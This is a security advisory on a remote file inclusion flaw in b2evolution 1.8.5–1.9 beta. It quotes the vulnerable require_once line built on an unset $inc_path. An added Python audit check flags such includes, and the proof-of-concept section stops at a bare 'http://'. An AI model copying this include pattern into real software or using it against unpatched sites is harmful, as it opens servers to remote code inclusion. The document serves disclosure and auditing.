_________________________________________
Severity: High
Title: b2evolution Remote File Inclusion Vulnerability
Date: 28.11.06
Author: tarkus (tarkus (at) tiifp (dot) org)
Web: https://tiifp.org/tarkus
Vendor: b2evolution (http://b2evolution.net/)
Affected Product(s): b2evolution 1.8.5 - 1.9 beta
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Description:
------------
Line 67 of import-mt.php (blogs/inc/CONTROL/imports):
>
>require_once $inc_path.'MODEL/files/_file.funcs.php';
>
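
Added example, not part of the advisory or of b2evolution's code: a small Python audit check that flags include/require statements whose path begins with a variable the file itself never assigns, the pattern shown on line 67. It assumes the inclusion is possible because $inc_path is not set by import-mt.php before that line, which the advisory does not state; the function name and both PHP samples are constructed.

```python
import re

# include/require whose path expression begins with a PHP variable
INCLUDE_RE = re.compile(r"\b(?:include|require)(?:_once)?\b\s*\(?\s*\$(\w+)", re.I)
# plain assignment to a variable ($x = ...), excluding == and =>
ASSIGN_RE = re.compile(r"\$(\w+)\s*=(?![=>])")


def find_unanchored_includes(source):
    """Return (line_no, variable, statement) for each include whose leading
    path variable has not been assigned earlier in the same file."""
    assigned, findings = set(), []
    for line_no, line in enumerate(source.splitlines(), start=1):
        code = line.strip()
        if code.startswith(("//", "#", "*", "/*")):
            continue  # skip comment lines
        m = INCLUDE_RE.search(code)
        if m and m.group(1) not in assigned:
            findings.append((line_no, m.group(1), code))
        # record assignments after the check so order within the file matters
        assigned.update(ASSIGN_RE.findall(code))
    return findings


# Constructed sample: the include from the advisory with no prior assignment.
FLAGGED_SAMPLE = """<?php
// constructed stand-in for the top of an import script
require_once $inc_path.'MODEL/files/_file.funcs.php';
"""

# Constructed sample: same include, path variable set by the script itself
# (the relative path is an assumption made for illustration).
ANCHORED_SAMPLE = """<?php
$inc_path = dirname(__FILE__).'/../../';
require_once $inc_path.'MODEL/files/_file.funcs.php';
"""

if __name__ == "__main__":
    for name, src in (("flagged", FLAGGED_SAMPLE), ("anchored", ANCHORED_SAMPLE)):
        for line_no, var, stmt in find_unanchored_includes(src):
            print(f"{name}: line {line_no}: ${var} not set in this file: {stmt}")
```

A hit is a lead for manual review, not a confirmed flaw: the variable may be set by a file included earlier, which this single-file check does not follow.
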
PoC:
----
http://